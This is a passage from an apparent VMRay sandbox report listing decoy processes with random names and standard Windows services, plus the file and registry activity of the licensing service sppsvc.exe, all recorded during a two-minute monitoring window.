| Command Line | "C:\Program Files\UNP\convertible-suicide-construction.exe" |
| Initial Working Directory | C:\Program Files\UNP\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xcd8 |
| Parent PID | 0x860 (c:\windows\explorer.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
E80
0x
7BC
|
Process #87: mas.exe
0
0
| Information | Value |
|---|---|
| ID | #87 |
| File Name | c:\program files (x86)\internet explorer\mas.exe |
| Command Line | "C:\Program Files (x86)\Internet Explorer\mas.exe" |
| Initial Working Directory | C:\Program Files (x86)\Internet Explorer\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xcf0 |
| Parent PID | 0x860 (c:\windows\explorer.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
BE8
0x
D00
|
Process #88: flashing_gcc_little.exe
0
0
| Information | Value |
|---|---|
| ID | #88 |
| File Name | c:\program files (x86)\windowspowershell\flashing_gcc_little.exe |
| Command Line | "C:\Program Files (x86)\WindowsPowerShell\flashing_gcc_little.exe" |
| Initial Working Directory | C:\Program Files (x86)\WindowsPowerShell\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xcec |
| Parent PID | 0x860 (c:\windows\explorer.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B80
0x
CE4
|
Process #89: americannumberssubstance.exe
0
0
| Information | Value |
|---|---|
| ID | #89 |
| File Name | c:\program files (x86)\windows portable devices\americannumberssubstance.exe |
| Command Line | "C:\Program Files (x86)\Windows Portable Devices\americannumberssubstance.exe" |
| Initial Working Directory | C:\Program Files (x86)\Windows Portable Devices\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x658 |
| Parent PID | 0x860 (c:\windows\explorer.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
D8C
0x
654
|
Process #90: stupid-jeffrey-investors.exe
0
0
| Information | Value |
|---|---|
| ID | #90 |
| File Name | c:\program files (x86)\microsoft office\stupid-jeffrey-investors.exe |
| Command Line | "C:\Program Files (x86)\Microsoft Office\stupid-jeffrey-investors.exe" |
| Initial Working Directory | C:\Program Files (x86)\Microsoft Office\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa8c |
| Parent PID | 0x860 (c:\windows\explorer.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
BFC
0x
788
|
Process #91: successfully.exe
0
0
| Information | Value |
|---|---|
| ID | #91 |
| File Name | c:\program files (x86)\windowspowershell\successfully.exe |
| Command Line | "C:\Program Files (x86)\WindowsPowerShell\successfully.exe" |
| Initial Working Directory | C:\Program Files (x86)\WindowsPowerShell\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd48 |
| Parent PID | 0x860 (c:\windows\explorer.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
84
0x
D44
|
Process #92: does.exe
0
0
| Information | Value |
|---|---|
| ID | #92 |
| File Name | c:\program files\rempl\does.exe |
| Command Line | "C:\Program Files\rempl\does.exe" |
| Initial Working Directory | C:\Program Files\rempl\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x90c |
| Parent PID | 0x860 (c:\windows\explorer.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
F4
0x
D2C
|
Process #93: chocolate.exe
0
0
| Information | Value |
|---|---|
| ID | #93 |
| File Name | c:\program files (x86)\windows mail\chocolate.exe |
| Command Line | "C:\Program Files (x86)\Windows Mail\chocolate.exe" |
| Initial Working Directory | C:\Program Files (x86)\Windows Mail\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc30 |
| Parent PID | 0x860 (c:\windows\explorer.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
F0
0x
B04
|
Process #94: gnu.exe
0
0
| Information | Value |
|---|---|
| ID | #94 |
| File Name | c:\program files\windows media player\gnu.exe |
| Command Line | "C:\Program Files\Windows Media Player\gnu.exe" |
| Initial Working Directory | C:\Program Files\Windows Media Player\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd5c |
| Parent PID | 0x860 (c:\windows\explorer.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
868
0x
D68
0x
D58
|
Process #95: superbguilty.exe
0
0
| Information | Value |
|---|---|
| ID | #95 |
| File Name | c:\program files (x86)\windows photo viewer\superbguilty.exe |
| Command Line | "C:\Program Files (x86)\Windows Photo Viewer\superbguilty.exe" |
| Initial Working Directory | C:\Program Files (x86)\Windows Photo Viewer\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd10 |
| Parent PID | 0x860 (c:\windows\explorer.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
6DC
0x
D80
|
Process #96: daddy.exe
0
0
| Information | Value |
|---|---|
| ID | #96 |
| File Name | c:\program files\reference assemblies\daddy.exe |
| Command Line | "C:\Program Files\Reference Assemblies\daddy.exe" |
| Initial Working Directory | C:\Program Files\Reference Assemblies\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd18 |
| Parent PID | 0x860 (c:\windows\explorer.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
7CC
0x
C34
0x
D14
|
Process #97: vt mapping.exe
0
0
| Information | Value |
|---|---|
| ID | #97 |
| File Name | c:\program files\windows security\vt mapping.exe |
| Command Line | "C:\Program Files\Windows Security\vt mapping.exe" |
| Initial Working Directory | C:\Program Files\Windows Security\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xdcc |
| Parent PID | 0x860 (c:\windows\explorer.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
720
0x
A60
0x
DC8
|
Process #98: primarily-walk.exe
0
0
| Information | Value |
|---|---|
| ID | #98 |
| File Name | c:\program files (x86)\adobe\primarily-walk.exe |
| Command Line | "C:\Program Files (x86)\Adobe\primarily-walk.exe" |
| Initial Working Directory | C:\Program Files (x86)\Adobe\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa5c |
| Parent PID | 0x860 (c:\windows\explorer.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
704
0x
BB4
0x
668
|
Process #99: hungary.exe
0
0
| Information | Value |
|---|---|
| ID | #99 |
| File Name | c:\program files (x86)\windowspowershell\hungary.exe |
| Command Line | "C:\Program Files (x86)\WindowsPowerShell\hungary.exe" |
| Initial Working Directory | C:\Program Files (x86)\WindowsPowerShell\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xbec |
| Parent PID | 0x860 (c:\windows\explorer.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
6AC
0x
7FC
|
Process #100: maternity.exe
0
0
| Information | Value |
|---|---|
| ID | #100 |
| File Name | c:\program files (x86)\windows media player\maternity.exe |
| Command Line | "C:\Program Files (x86)\Windows Media Player\maternity.exe" |
| Initial Working Directory | C:\Program Files (x86)\Windows Media Player\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x2ac |
| Parent PID | 0x860 (c:\windows\explorer.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
68C
0x
2D4
|
Process #101: telephony_assumption_pharmacies.exe
0
0
| Information | Value |
|---|---|
| ID | #101 |
| File Name | c:\program files (x86)\windows mail\telephony_assumption_pharmacies.exe |
| Command Line | "C:\Program Files (x86)\Windows Mail\telephony_assumption_pharmacies.exe" |
| Initial Working Directory | C:\Program Files (x86)\Windows Mail\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xdb4 |
| Parent PID | 0x860 (c:\windows\explorer.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
738
0x
DC0
0x
DC4
|
Process #103: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #103 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\WINDOWS\system32\svchost.exe -k LocalServiceAndNoImpersonation |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x86c |
| Parent PID | 0x250 (c:\windows\system32\services.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\Local Service |
| Enabled Privileges | SeChangeNotifyPrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
D20
0x
A98
0x
DEC
0x
A70
0x
26C
0x
8F0
0x
C04
0x
C38
0x
840
|
Process #104: compattelrunner.exe
0
0
| Information | Value |
|---|---|
| ID | #104 |
| File Name | c:\windows\system32\compattelrunner.exe |
| Command Line | C:\WINDOWS\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xefc |
| Parent PID | 0x12c (c:\windows\system32\svchost.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege, SeDelegateSessionUserImpersonatePrivilege |
| Thread IDs |
0x
47C
0x
4B0
|
Process #106: trustedinstaller.exe
0
0
| Information | Value |
|---|---|
| ID | #106 |
| File Name | c:\windows\servicing\trustedinstaller.exe |
| Command Line | C:\WINDOWS\servicing\TrustedInstaller.exe |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1064 |
| Parent PID | 0x250 (c:\windows\system32\services.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege, SeDelegateSessionUserImpersonatePrivilege |
| Thread IDs |
0x
10A0
0x
108C
0x
1084
0x
1080
0x
107C
0x
1074
0x
1070
0x
1068
|
Process #107: sppsvc.exe
5775
0
| Information | Value |
|---|---|
| ID | #107 |
| File Name | c:\windows\system32\sppsvc.exe |
| Command Line | C:\WINDOWS\system32\sppsvc.exe |
| Initial Working Directory | C:\WINDOWS |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:00 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x11c4 |
| Parent PID | 0x250 (c:\windows\system32\services.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\Network Service |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
1360
0x
135C
0x
11E4
0x
11D0
0x
11C8
0x
CA0
0x
11A0
0x
1054
0x
13C0
0x
47C
|
Host Behavior
File (11)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\WINDOWS\System32\spp\store\2.0\data.dat | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_WRITE_THROUGH, share_mode = FILE_SHARE_READ |
|
2 | |
| Get Info | C:\WINDOWS\System32\spp\store\2.0\data.dat.bak | type = file_attributes |
|
3 | |
| Get Info | C:\WINDOWS\System32\spp\store\2.0\data.dat.tmp | type = file_attributes |
|
3 | |
| Get Info | C:\WINDOWS\System32\spp\store\2.0\data.dat | type = size, size_out = 0 |
|
2 | |
| Read | C:\WINDOWS\System32\spp\store\2.0\data.dat | size = 27552, size_out = 27552 |
|
1 |
Registry (112)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-1 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-10 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-11 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-12 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-13 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-14 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-15 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-16 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-17 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-18 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-19 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-2 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-20 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-21 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-22 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-23 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-24 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-25 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-26 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-27 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-28 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-29 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-3 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-30 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-31 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-32 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-33 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-34 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-35 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-36 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-37 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-4 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-5 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-6 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-7 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-8 | - |
|
1 | |
| Open Key | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-9 | - |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-1 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-10 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-11 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-12 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-13 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-14 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-15 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-16 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-17 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-18 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-19 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-2 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-20 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-21 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-22 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-23 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-24 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-25 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-26 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-27 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-28 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-29 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-3 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-30 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-31 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-32 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-33 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-34 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-35 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-36 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-37 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-4 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-5 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-6 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-7 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-8 | type = REG_BINARY |
|
1 | |
| Read Value | 8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-9 | type = REG_BINARY |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 |
Module (6)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\ntdll.dll | base_address = 0x7ff931f40000, flags = GET_MODULE_HANDLE_EX_FLAG_PIN |
|
2 | |
